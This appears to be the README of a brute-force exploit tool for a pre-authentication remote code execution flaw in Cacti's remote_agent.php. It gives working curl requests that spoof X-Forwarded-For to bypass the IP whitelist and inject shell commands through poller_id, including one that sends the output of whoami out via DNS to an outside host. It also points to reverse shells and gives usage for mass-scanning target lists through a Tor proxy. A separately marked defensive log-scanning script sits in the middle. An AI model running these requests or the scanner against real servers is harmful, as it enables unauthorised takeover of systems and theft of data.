Cacti Blind Remote Code Execution (Pre-Auth)
This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.
This script bruteforces the variables required to exploit this vulnerability. The exploit requires the following 3 variables:
- Whitelisted IP address
- Correct host_id parameter
- Correct local_data_ids parameter
The file remote_agent.php is protected by an IP whitelist. You can bypass this by spoofing your IP address in the X-Forwarded-For header. Most instances will have 127.0.0.1 or the server's own IP address whitelisted.
Next you need to bruteforce the host_id and local_data_ids request parameters. This is done by enumerating pairs of integers x,y from a default min value of 1 to a default max value of 10.
Example Request
pair_x="1"
pair_y="2"
curl -k -H "X-Forwarded-For: 127.0.0.1" \
"https://target.com/cacti/remote_agent.php?action=polldata&poller_id=1&host_id=$pair_x&local_data_ids[]=$pair_y"
After you've gotten these 3 variables, you can inject a shell command into the poller_id key and escape it by putting a ; before your command.
This is a blind RCE, so you need to send the output of your command somewhere like interact.sh or open a reverse shell. Remember to URL encode your poller_id value!
The following executes the command ping $(whoami).test.com
curl -k -H "X-Forwarded-For: 127.0.0.1" \
"https://target.com/cacti/remote_agent.php?action=polldata&host_id=1&local_data_ids[]=3&poller_id=;ping%20%24%28whoami%29.test.com"
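For defenders, an added example that is not part of this tool or of Cacti: a scanner that reads web-server access log lines and flags the injection pattern shown above, a remote_agent.php polldata request whose poller_id is not a bare integer. The log lines, IP addresses and hostnames are constructed placeholders, and the query string is parsed by hand so a literal ; in the value is never treated as a separator.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache/nginx combined-log prefix: client ip, identd, user, [timestamp], "request line"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

def parse_query(query):
    """Split a query string on '&' only, so a literal ';' in a value survives on every Python version."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def injection_reason(target):
    """Return why a request target looks like the poller_id injection, or None if it looks benign."""
    parts = urlsplit(target)
    if not parts.path.endswith("/remote_agent.php"):
        return None
    params = parse_query(parts.query)
    if params.get("action") != ["polldata"]:
        return None
    for value in params.get("poller_id", []):
        if not value.strip().isdigit():  # a real poller sends a bare integer here
            return "non-numeric poller_id: %r" % value
    return None

def scan_access_log(lines):
    """Return (client_ip, timestamp, reason) for every log line matching the pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        reason = injection_reason(m.group("target"))
        if reason is not None:
            hits.append((m.group("ip"), m.group("time"), reason))
    return hits

# Constructed sample lines (documentation IPs and a placeholder hostname), not real traffic.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Jan/2023:12:00:01 +0000] "GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=2 HTTP/1.1" 200 512',
    '203.0.113.10 - - [10/Jan/2023:12:00:02 +0000] "GET /cacti/remote_agent.php?action=polldata&host_id=1&local_data_ids[]=3&poller_id=;ping%20%24%28whoami%29.test.com HTTP/1.1" 200 88',
    '198.51.100.7 - - [10/Jan/2023:12:00:03 +0000] "GET /cacti/remote_agent.php?action=polldata&host_id=2&local_data_ids[]=5&poller_id=%3Bid HTTP/1.1" 200 88',
    '198.51.100.7 - - [10/Jan/2023:12:00:04 +0000] "GET /cacti/index.php HTTP/1.1" 200 1024',
]
```

The standard combined log format does not record the X-Forwarded-For header, so the whitelist spoofing itself is only visible if the log format is extended to include it; the injected poller_id, however, always appears in the request line.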
The script outputs in CSV format. The headers are "target", "ip", "host_id", "data_id", "url".
If the url value is missing, it means the script was able to bypass the IP restriction but not successfully bruteforce the IDs. You can take this output and set a higher max value to attempt again.
You can use the following commands to quickly parse the output file (unique targets, then unique URLs):
tail -n +2 results.csv | cut -d ',' -f1 | sort -u
tail -n +2 results.csv | cut -d ',' -f5 | sort -u
go build -v -o bruteforce bruteforce.go
./bruteforce -l targets.txt -t 50 -min 1 -max 10
- Targets must be a list of IP addresses; the port may be omitted
- Socks5 proxy is supported: -proxy socks5://127.0.0.1:9050
- Default output file is results.csv